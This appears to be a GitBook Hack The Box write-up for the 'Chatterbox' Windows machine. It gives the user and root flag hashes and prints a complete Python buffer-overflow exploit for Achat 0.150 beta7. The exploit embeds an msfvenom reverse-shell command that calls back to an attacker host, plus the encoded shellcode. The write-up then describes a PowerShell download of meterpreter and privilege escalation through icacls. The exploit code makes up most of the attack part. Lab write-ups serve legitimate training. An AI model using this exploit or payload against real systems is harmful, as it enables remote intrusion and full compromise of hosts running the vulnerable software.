Hacking
Hacking
Github
Twitter
Hacking & Penetration Testing
Commands
Methodologies
Buffer Overflow
Internal Network
Mobile Testing
Subdomain Enumeration
Web Application Testing
XSS
OOB
IDOR / PrivEsc
Misc
CSRF
XML
SQL
XML External Entities
Commands
Windows Commands
Guides
Mac OS Build
Build A Raspberry Pi Dropbox
Configuring Burpsuite Pro
BugBounty
Manual SQL Injection
Courses
Hack The Box
Legacy
Devel
Optimum
Popcorn
Beep
Tenten
Arctic
Cronos
Grandpa
Granny
October
Lazy
Sneaky
Holiday
Blocky
Shrek
Blue
Joker
Europa
Haircut
Bank
SolidState
Mantis
Shocker
Tally
Sense
Jeeves
Stratosphere
Inception
Bashed
Fluxcapacitor
Canape
Rabbit
Chatterbox
Nibbles
Sunday
Aragog
Valentine
Silo
Olympus
Poison
Celestial
Waldo
Jerry
Access
Active
Netmon
Powered by GitBook

Chatterbox

Chatterbox - 10.10.10.74

Target Enumeration:

OS: Windows

IP: 10.10.10.74

User: 72290246dfaedb1e3e3ac9d6fb306334

Root: a673d1b1fa95c276c5ef2aa13d9dcc7c

Ports / Services / Software Versions Running

9255/tcp open mon

9256/tcp open -

Vulnerability Exploited:

Achat Remote Buffer Overflow.

https://www.exploit-db.com/exploits/36025/

Privilege Escalation:

Icacls on root.txt allows current user to read any file owned by the administrator.

Exploiting the host:

Nmap took too long so I used Sparta on this one:

Revealed port 9255 & 9256 open.

Googling the port gave us Achat

That is a really buggy metasploit exploit so we found a better one online:

https://www.exploit-db.com/exploits/36025/

Generate your shellcode

Paste that into the script so it looks as follows:

#!/usr/bin/python
# Author KAhara MAnhara - modified
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit
​
import socket
import sys, time
​
# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
​
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x47\x78\x53\x52"
buf += "\x4d\x30\x4d\x30\x59\x70\x43\x30\x45\x39\x6b\x35\x6e"
buf += "\x51\x55\x70\x71\x54\x72\x6b\x72\x30\x6c\x70\x54\x4b"
buf += "\x4f\x62\x7a\x6c\x72\x6b\x42\x32\x6e\x34\x44\x4b\x30"
buf += "\x72\x6b\x78\x6a\x6f\x37\x47\x6d\x7a\x4f\x36\x30\x31"
buf += "\x69\x6f\x66\x4c\x6f\x4c\x51\x51\x51\x6c\x59\x72\x4e"
buf += "\x4c\x6b\x70\x79\x31\x46\x6f\x4c\x4d\x49\x71\x57\x57"
buf += "\x79\x52\x39\x62\x4e\x72\x32\x37\x52\x6b\x30\x52\x4a"
buf += "\x70\x32\x6b\x4e\x6a\x4f\x4c\x72\x6b\x4e\x6c\x4b\x61"
buf += "\x71\x68\x69\x53\x6e\x68\x79\x71\x68\x51\x32\x31\x62"
buf += "\x6b\x50\x59\x6b\x70\x59\x71\x46\x73\x74\x4b\x61\x39"
buf += "\x7a\x78\x5a\x43\x6e\x5a\x6d\x79\x34\x4b\x30\x34\x74"
buf += "\x4b\x49\x71\x57\x66\x30\x31\x49\x6f\x74\x6c\x56\x61"
buf += "\x46\x6f\x6c\x4d\x59\x71\x69\x37\x4e\x58\x67\x70\x70"
buf += "\x75\x69\x66\x49\x73\x53\x4d\x39\x68\x4f\x4b\x71\x6d"
buf += "\x6b\x74\x73\x45\x37\x74\x51\x48\x54\x4b\x6f\x68\x6f"
buf += "\x34\x79\x71\x5a\x33\x32\x46\x44\x4b\x6a\x6c\x30\x4b"
buf += "\x52\x6b\x71\x48\x6d\x4c\x39\x71\x56\x73\x72\x6b\x6c"
buf += "\x44\x32\x6b\x6d\x31\x48\x50\x31\x79\x4d\x74\x6f\x34"
buf += "\x6e\x44\x4f\x6b\x31\x4b\x70\x61\x31\x49\x71\x4a\x52"
buf += "\x31\x6b\x4f\x47\x70\x51\x4f\x71\x4f\x70\x5a\x34\x4b"
buf += "\x4c\x52\x58\x6b\x72\x6d\x4f\x6d\x4f\x78\x30\x33\x50"
buf += "\x32\x79\x70\x69\x70\x53\x38\x52\x57\x73\x43\x50\x32"
buf += "\x31\x4f\x61\x44\x32\x48\x50\x4c\x30\x77\x4f\x36\x7a"
buf += "\x67\x6b\x4f\x36\x75\x36\x58\x62\x70\x49\x71\x59\x70"
buf += "\x49\x70\x6f\x39\x35\x74\x6f\x64\x32\x30\x43\x38\x4b"
buf += "\x79\x63\x50\x30\x6b\x4b\x50\x79\x6f\x48\x55\x42\x30"
buf += "\x70\x50\x42\x30\x42\x30\x51\x30\x62\x30\x61\x30\x6e"
buf += "\x70\x63\x38\x39\x5a\x7a\x6f\x79\x4f\x49\x50\x69\x6f"
buf += "\x78\x55\x45\x47\x32\x4a\x69\x75\x31\x58\x49\x7a\x4a"
buf += "\x6a\x6a\x6e\x6b\x58\x33\x38\x39\x72\x49\x70\x4a\x61"
buf += "\x65\x6b\x72\x69\x49\x56\x70\x6a\x4a\x70\x6f\x66\x51"
buf += "\x47\x70\x68\x44\x59\x46\x45\x53\x44\x43\x31\x59\x6f"
buf += "\x5a\x35\x35\x35\x59\x30\x62\x54\x6a\x6c\x49\x6f\x4e"
buf += "\x6e\x4c\x48\x44\x35\x78\x6c\x43\x38\x78\x70\x74\x75"
buf += "\x65\x52\x42\x36\x79\x6f\x79\x45\x62\x48\x30\x63\x52"
buf += "\x4d\x52\x44\x79\x70\x32\x69\x68\x63\x6f\x67\x4f\x67"
buf += "\x71\x47\x4c\x71\x7a\x56\x42\x4a\x6a\x72\x50\x59\x6e"
buf += "\x76\x49\x52\x4b\x4d\x42\x46\x35\x77\x31\x34\x6c\x64"
buf += "\x4d\x6c\x5a\x61\x6d\x31\x44\x4d\x31\x34\x4e\x44\x4a"
buf += "\x70\x76\x66\x6b\x50\x4e\x64\x51\x44\x30\x50\x6e\x76"
buf += "\x31\x46\x30\x56\x31\x36\x50\x56\x70\x4e\x50\x56\x72"
buf += "\x36\x71\x43\x51\x46\x42\x48\x43\x49\x68\x4c\x4f\x4f"
buf += "\x62\x66\x6b\x4f\x76\x75\x74\x49\x59\x50\x6e\x6e\x62"
buf += "\x36\x51\x36\x59\x6f\x30\x30\x33\x38\x79\x78\x53\x57"
buf += "\x4b\x6d\x51\x50\x4b\x4f\x78\x55\x45\x6b\x4c\x30\x76"
buf += "\x55\x35\x52\x70\x56\x62\x48\x63\x76\x34\x55\x77\x4d"
buf += "\x33\x6d\x49\x6f\x4a\x35\x4d\x6c\x4b\x56\x73\x4c\x7a"
buf += "\x6a\x53\x50\x39\x6b\x79\x50\x71\x65\x7a\x65\x67\x4b"
buf += "\x70\x47\x6d\x43\x62\x52\x32\x4f\x4f\x7a\x69\x70\x42"
buf += "\x33\x4b\x4f\x37\x65\x41\x41"
​
# Create a UDP socket - Change this host!!!
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)
​
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
​
print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()

Execute

Now you have a shell

Upgrade your shell to meterpreter as it is windows 7 we will use powershell to download it.

Generate a shell with msfvenom

Start your python web server and a metasploit listener

Download the file with the following commands and execute it.

Now you have a meterpreter shell

Enumerating the system show you that you can access the administrators desktop but cannot read the file.

Use the following command to assign ownership to alfred and collect the root flag.

Hack The Box - Previous
Rabbit
Next - Hack The Box
Nibbles
Last updated 1 year ago
Contents
Chatterbox - 10.10.10.74
Target Enumeration:
Ports / Services / Software Versions Running
Vulnerability Exploited:
Privilege Escalation:
Exploiting the host: